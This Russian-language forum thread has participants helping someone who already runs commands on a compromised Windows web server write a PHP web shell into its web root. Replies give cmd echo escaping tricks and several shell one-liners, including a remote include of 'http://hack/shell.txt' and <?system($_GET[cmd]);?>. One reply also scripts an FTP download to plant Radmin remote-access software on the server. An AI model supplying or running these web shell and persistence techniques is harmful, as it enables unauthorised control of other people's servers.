Вопрос такой!
Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой

так создается
echo test > "D:\Website\WWW\1.php"


если так вообще ничего не создается
echo <?php passthru $cmd?> > "D:\Website\WWW\1.php"

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"

т.е. на выходе получаю "<?php passthru $cmd?>"
Php на серваке есть!

Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?>

p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!!

как выйти именно из этой ситуации я хз..
Попробуй поднять фтп и передать шел =)

gold-goblin

Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win

нах тебе php-шелл, если у тебя уже cmd-шелл?

fly

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"


edit D:\Website\WWW\1.php

а чем кавычки мешают ? он и с ними будет нормально интерпретироваться.

to geezer.code

нет белый фон ""

а в исходники страницы "<?phpinfo();?>"

вообще не в тему Pashkela

вообще не в тему Pashkela


почему? У меня работает

сначала залил, точно как ты, а потом edit и убираешь кавычки

)))это локально)) , а у меня через сплоит перловый!

а ты сделай "<?php phpinfo();?>" обязательно - php
проверил локально, работает.

"<?phpinfo();?>" тоже выводит "" :)

Тогда так:

echo ^<?php passthru $cmd?^> > "D:\Website\WWW\1.php"

Создай сначала сам файл: echo > 1.php
Затем отредакти его: edit > 1.php
и впиши свой код, затем сохрани и все)

просто сервак глюченый , ничего не получилось)!

смотри за пробелами!!!
<? phpinfo(); ?>

попробуй так еще:
эхом создаешь файл с кавычками, через more - попробуй их убрать потом.
ну а если сделаешь вместо кавычек табуляцию, то потом:
more /T1 file.php

что там с правами
ибо в той дире де бажный скрипт работает php

В чем может быть дело еще?

У меня была подобная ситуация. У меня был шел вида <?php system(cmd) ?>. Вся проблема состоит в том, что тебе дает выполнять только одну команду. И команда edit ничего не даст. Решение было такое - так как "сервак" виндовый - можно залить Radmin и уже спомощью него можно делать что угодно.
Залить лучше всего через ФТП. команды такие

echo open ТВОЙ_FTP>go
echo binary >>go
echo get файл>go
....
echo bye>go
Запускать потом (ftp анонимный)
site.com/shell.php?cmd=ftp -A -s:go

fly, я не понимаю в чём там проблема. ДОлжно всё работать. Объясни подробнее что не получаеся.

Может просто регистрГолобалз ОФФ? ТОгда нужно шелл такой создавать:

<?system($_GET[cmd]);?>